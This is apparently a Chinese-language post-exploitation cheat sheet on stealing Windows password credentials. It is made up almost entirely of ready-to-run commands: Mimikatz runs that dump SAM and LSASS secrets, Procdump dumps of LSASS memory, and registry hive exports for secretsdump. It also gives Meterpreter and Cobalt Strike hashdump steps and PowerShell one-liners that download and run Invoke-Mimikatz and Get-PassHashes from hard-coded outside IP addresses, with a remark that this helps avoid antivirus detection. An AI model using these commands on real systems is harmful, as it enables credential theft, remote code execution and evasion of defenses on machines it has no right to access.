Windows获取密码凭证

Windows获取密码凭证

Mimikatz本机非交互获取

mimikatz.exe “log res.txt” “privilege::debug” “token::elevate” “lsadump::sam” “exit”

mimikatz.exe “log logon.txt” “privilege::debug” “sekurlsa::logonpasswords” “exit”

命令解析:

“log res.txt” //将获取信息保存如本地运行路径 res.txt

privilege::debug //提升权限

“lsadump::sam” //将sam密码库,lsadump下来,

“sekurlsa::logonpasswords”//lohonpasswprds列出所有可用的提供程序凭据

1.x版本

inject::process lsass.exe sekurlsa.dll //注入 sekurlsa.dll 到 lsass.exe(用户登录程序) 进程里

@getLogonPasswords //获取密码

Powershell脚本

远程加载mimikatz脚本

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://47.96.224.128:8008/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds

解释:

powershell开启一个IEX缓存会话,从’http://39.108.68.207:8000/Invoke-Mimikatz.ps1加载远程脚本获取.缓存加载减少,被查杀的概率

注意本地回显并不会回显到VPS服务器上

远程加载Get-PassHashes脚本

powershell IEX(new-object net.webclient).downloadstring(‘http://47.96.224.128:8008/Get-PassHashes.ps1');Get-PassHashes

于上原理一致

WCE

WCE:Windows Credentials Editor WCE是跟mimikztz齐名的一款hash管理工具。

官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

Pwddump

Ophcrack与彩虹表

如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。

工具下载:https://ophcrack.sourceforge.io/

彩虹表:

https://ophcrack.sourceforge.io/tables.php

http://project-rainbowcrack.com/table.htm

Procdump + Mimikatz

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Procdump lsass 进程导出:

For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

再把lsass.dmp文件加载mimikatz

sekurlsa::minidump lsass.dmp

最后显示

sekurlsa::logonPasswords full

注册表Get hash

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\SECURITY security.hiv

mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit

11.15.7

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

与之前方式不同

LaZagne

自动化获取脚本

项目地址: https://github.com/AlessandroZ/LaZagne

Meterpreter获取Hash

发不多说上马拿meterpreter

两种后渗透获取:

use post/windows/gather/hashdump //system权限的meterpreter

use post/windows/gather/smart_hashdump

image-20201115125430250

或者

直接

Mimikatz

Load mimikatz

获取用户密码的hash值

wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp

mimikatz_command -h

mimikatz_command -f :: //查询有哪些模块

mimikatz_command -f samdump::hashes //从windows的sam文件中读取密码hash值

mimikatz_command -f sekurlsa::searchPasswords //获取明文密码

mimikatz_command -f samdump::bootkey

Cobaltstrrike获取

hashdump

logonpasswords

mimikatz sekurlsa::logonpasswords